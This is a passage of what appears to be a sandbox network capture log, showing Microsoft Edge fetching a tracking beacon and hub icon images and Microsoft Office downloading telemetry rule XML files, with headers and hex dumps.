                                                                                                                                                                                                                                                        2024-11-20 23:49:41 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        60192.168.2.54980213.32.99.1054437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:41 UTC925OUTGET /b?rn=1732146580940&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=02AF36CE75CE647F00F523F374AC6592&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                        Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:41 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:41 GMT
                                                                                                                                                                                                                                                        Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                        Location: /b2?rn=1732146580940&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=02AF36CE75CE647F00F523F374AC6592&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                        set-cookie: UID=1C70541621bece877abc00a1732146581; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                        set-cookie: XID=1C70541621bece877abc00a1732146581; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                        Via: 1.1 68b2682a924ac399aa2724b5b439e75c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: FRA60-P3
                                                                                                                                                                                                                                                        X-Amz-Cf-Id: hh2BPo21LHdkQ3oUFxzqMZicdl2zwN2WNehLPqFZBeW9_ZmevIWFFw==


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        61192.168.2.54984513.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:42 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:42 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 478
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                        x-ms-request-id: 9f194ed4-601e-0070-357c-3ba0c9000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234942Z-178bfbc474bh5zbqhC1NYCkdug00000000n000000000fr7n
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        62192.168.2.54984813.107.246.404437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC438OUTGET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1
                                                                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC523INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:43 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 1579
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Fri, 03 Nov 2023 21:43:08 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DBDCB5DE99522A
                                                                                                                                                                                                                                                        x-ms-request-id: 5c02eac9-701e-0041-30a6-3b4014000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234943Z-178bfbc474bp8mkvhC1NYCzqnn00000000d0000000004tba
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                                                                        X-Cache: TCP_MISS
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC1579INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 c0 49 44 41 54 78 01 ed 58 4f 8b 5c 45 10 af 7a f3 66 66 15 c5 fd 00 42 66 f2 05 b2 22 c2 1e 54 d6 4f 90 15 c1 63 d8 e0 49 04 37 01 11 11 25 89 e0 d5 04 0f 1a f0 e0 e6 62 c4 cb 1e 44 50 21 b8 df 20 7b f0 4f 6e 1b 4f 8b 20 cc 7a 89 b3 ef 75 57 f9 ab ea 9e 37 cb 66 77 66 36 93 83 84 ad a4 d3 fd de eb 79 fd 7b bf fa 55 75 75 88 4e ed d4 9e 20 5b d9 dc ed 2d df de ed d1 63 34 a6 39 6c e5 fb c1 4a 54 39 2f 42 ab 22 d2 8b 91 54 a2 92 d4 91 63 90 6d 09 74 57 2a fd fc b7 77 9e df a6 47 b4 47 02 b8 f2 f3 60 29
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxXO\EzffBf"TOcI7%bDP! {OnO zuW7fwf6y{UuuN [-c49lJT9/B"TcmtW*wGG`)


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        63192.168.2.54984713.107.246.404437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC431OUTGET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1
                                                                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:43 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 1966
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Fri, 03 Nov 2023 21:43:31 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DBDCB5EC122A94
                                                                                                                                                                                                                                                        x-ms-request-id: fb9fdabc-901e-0026-4ca6-3bf3b3000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234943Z-r1d97b99577hc74hhC1TEBvbns00000009e000000000amy0
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_MISS
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC1966INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 43 49 44 41 54 78 01 ed 97 5b 68 5c 75 1e c7 7f ff 73 f9 9f 49 d2 49 4f da 98 b4 6a d7 d9 c5 16 bc b0 4e c1 bd c8 6e d8 99 07 1f 74 1f 9a e0 2a 15 77 d7 06 0b 82 0f d5 3c 54 10 1f 3a 41 d0 2a 8a 2d 55 29 68 4d 14 1f 6a d3 92 3c 28 58 45 92 fa d0 0a 82 8e 48 14 6a 6b 53 d0 b4 21 4d e7 cc 64 6e 67 ce cd ef ef 64 4e 48 ed c5 74 d2 e8 4b 7f c3 9f ff b9 cd 39 9f f3 fd ff 6e 87 e8 ba 2d cd c4 62 2f 1c 1a 1a 4a 29 8a b2 c9 f3 bc 44 10 04 3c c8 71 1c 0b fb 59 8c af 71 6e a4 b7 b7 d7 a2 6b 6c bf 0a 38 3c 3c fc
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaCIDATx[h\usIIOjNnt*w<T:A*-U)hMj<(XEHjkS!MdngdNHtK9n-b/J)D<qYqnkl8<<


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        64192.168.2.54984613.107.246.404437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC433OUTGET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1
                                                                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:43 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 1751
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Tue, 17 Oct 2023 00:34:33 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DBCEA8D5AACC85
                                                                                                                                                                                                                                                        x-ms-request-id: 89b14d01-501e-0030-73a6-3b322d000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234943Z-1777c6cb754mrj2shC1TEB6k7w0000000aeg00000000ap5t
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_MISS
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC1751INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 6c 49 44 41 54 78 01 ed 98 4d 6c 54 55 14 c7 cf 9d ce b4 52 09 42 85 b8 40 ed f3 23 44 37 0a b8 32 71 01 71 a1 89 1b dc 08 3b ab 0b 64 87 b8 30 84 10 3a c3 c2 a5 1a 57 b8 52 16 26 6e 8c 10 3f 91 c5 a0 a2 21 0d d1 c6 18 63 34 9a 91 b8 c0 40 6c a1 ed cc 7b ef 7e 1c ff e7 de fb e6 4d 3f a0 1f d4 e8 a2 17 5e de eb ed 9b f7 7e f7 7f ce f9 9f 3b 25 5a 1b 6b e3 bf 1d 8a 56 71 d4 cf f2 2e 36 34 ca 44 bb d8 11 15 07 71 cf 19 ff 71 ad 08 3f 3b 4b 13 4e bb 3f 74 27 1f cf 3a d4 38 71 68 5d eb 5f 03 3c 76 86 9f c7
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAalIDATxMlTURB@#D72qq;d0:WR&n?!c4@l{~M?^~;%ZkVq.64Dqq?;KN?t':8qh]_<v


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        65192.168.2.54984913.107.246.404437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC433OUTGET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1
                                                                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:43 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 1427
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Fri, 03 Nov 2023 21:43:36 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DBDCB5EF021F8E
                                                                                                                                                                                                                                                        x-ms-request-id: 5000eb33-001e-006c-3387-3bc3d4000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234943Z-178bfbc474bw8bwphC1NYC38b400000000fg000000003qwe
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC1427INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 28 49 44 41 54 78 01 ed 57 cd 6b 24 45 14 7f af 67 86 c4 5d cd 8e 9b 05 d1 3d ec e8 1f 20 5e 3d 28 eb 41 04 41 44 10 3c 66 d1 53 92 d3 42 40 72 da 11 84 5c b3 7f 80 24 39 48 40 d4 8b 17 2f b2 e2 1f a0 1e 25 a7 01 11 16 17 35 1f f3 d1 dd d5 55 cf 57 df d5 d3 eb 4e 5a f0 22 53 a1 52 9d 57 5d ef fd de ef 7d 74 05 60 39 96 63 39 96 e3 3f 1d 08 ff 62 1c 1f 1f df e6 e5 9e 52 ea 15 5e fb bc 02 11 99 a9 9f f5 e4 41 52 4a 74 7b df f3 7a 77 7b 7b fb 67 68 39 5a 03 3c 3a 3a da 40 c4 43 0f ea 1f 56 3d 34 38 e2 89
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAa(IDATxWk$Eg]= ^=(AAD<fSB@r\$9H@/%5UWNZ"SRW]}t`9c9?bR^ARJt{zw{{gh9Z<::@CV=48


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        66192.168.2.54985113.107.246.404437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC430OUTGET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1
                                                                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:43 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 2008
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Oct 2023 17:24:26 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DBC9B5C0C17219
                                                                                                                                                                                                                                                        x-ms-request-id: 2e1a9b33-a01e-0007-53a6-3b9e82000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234943Z-1777c6cb754wcxkwhC1TEB3c6w0000000aa0000000001q59
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_MISS
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC2008INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 6d 49 44 41 54 78 01 ed 98 bf 6f 14 47 14 c7 df ec 9d 11 48 48 5c aa 94 de 74 74 18 45 a9 59 24 0a d2 24 54 91 a0 f1 39 44 24 45 24 ec 32 0d be 28 05 44 14 98 2a e9 7c 96 50 e4 26 32 11 2d 02 47 91 02 4d 64 a3 08 25 92 a5 70 fc 05 18 ff 38 df ed af 97 ef 77 76 66 bd 36 07 67 9b 58 69 18 69 34 b3 b3 bb b3 9f fb ce 7b 6f de 9c c8 bb f2 76 c5 c8 21 95 bf 66 35 4c 33 59 8a 33 6d e0 33 53 1f 7e 69 66 38 fe 74 56 c7 b2 54 1e 26 a9 34 f2 4c a6 3e fa ba 18 ff e3 96 36 7b 89 cc 6e f5 45 92 2c 9b f8 b8 55 6f 73
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAamIDATxoGHH\ttEY$$T9D$E$2(D*|P&2-GMd%p8wvf6gXii4{ov!f5L3Y3m3S~if8tVT&4L>6{nE,Uos


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        67192.168.2.54985013.107.246.404437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC422OUTGET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1
                                                                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:43 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 2229
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Wed, 25 Oct 2023 19:48:24 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DBD59359A9E77B
                                                                                                                                                                                                                                                        x-ms-request-id: 33fb47a1-101e-0073-3999-3b18c4000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234943Z-1777c6cb754xrr98hC1TEB3kag0000000a60000000007c3w
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
